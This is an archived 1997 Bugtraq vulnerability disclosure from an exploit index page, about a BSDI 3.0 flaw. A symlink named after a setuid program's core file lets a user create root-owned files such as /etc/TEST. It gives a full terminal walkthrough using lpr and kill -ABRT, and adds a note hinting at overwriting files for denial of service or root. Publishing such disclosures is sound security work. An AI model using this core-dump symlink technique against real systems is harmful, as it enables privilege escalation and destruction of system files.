BSDI 3.x corefile problem
Description: | BSDI 3.0 apparently allows any program to overwrite/create files through a core dump link. |
Author: | Nir Soffer <scorpios@CS.HUJI.AC.IL> |
Compromise: | Definately DOS, possibly become r00t |
Vulnerable Systems: | BSDI 3.0 |
Date: | 19 June 1997 |
Notes: | Several people mentioned that he was wrong about overwriting files. If the mode is 0600, you CAN overwrite them. This includes a lot of files you might want to overwrite ;). |
Date: Thu, 19 Jun 1997 20:42:33 +0300
From: Nir Soffer <scorpios@CS.HUJI.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Core file anomalies under BSDi 3.0
Well for starters, system information :
BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31
13:39:46 IDT 1997 danny@sexta.cs.huji.ac.il:/usr/src/sys/compile/SEXTA
i386
A small and neat bug in BSDi 3.x allows people to arbitrarly write files
with crap for data, but not overwrite them. Like so:
Have a symbolic link, called [programname].core to desired file. Program
must be setuid root.
beep[ /tmp ] ls -la lpr.core
lrwxrwxrwt 1 root wheel 9 Jun 19 20:30 lpr.core@ -> /etc/TEST
beep[ /tmp ]
Just to make sure that file doesn't exist :
beep[ /tmp ] ls -la /etc/TEST
ls: /etc/TEST: No such file or directory
beep[ /tmp ]
Run program. (In our case lpr is convenient since it waits for tty input
and suspends itself.)
beep[ /tmp ] lpr &
[1] 27886
beep[ /tmp ]
[1] + Suspended (tty input) lpr
beep[ /tmp ]
Kill it with the ABRT signal.
beep[ /tmp ] kill -ABRT %1
beep[ /tmp ] fg
lpr
Abort (core dumped)
beep[ /tmp ]
And voila :
beep[ /tmp ] ls -la /etc/TEST
-rw------- 1 root wheel 184320 Jun 19 20:39 /etc/TEST
beep[ /tmp ]
This exploit is similar to the Solaris 2.4 core exploit - with a few
notable diffrences :
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.
B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.
C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.
Regards,
Nir.
--
Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
USER, n.:
The word computer professionals use when they mean "idiot."
-- Dave Barry, "Claw Your Way to the Top"
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: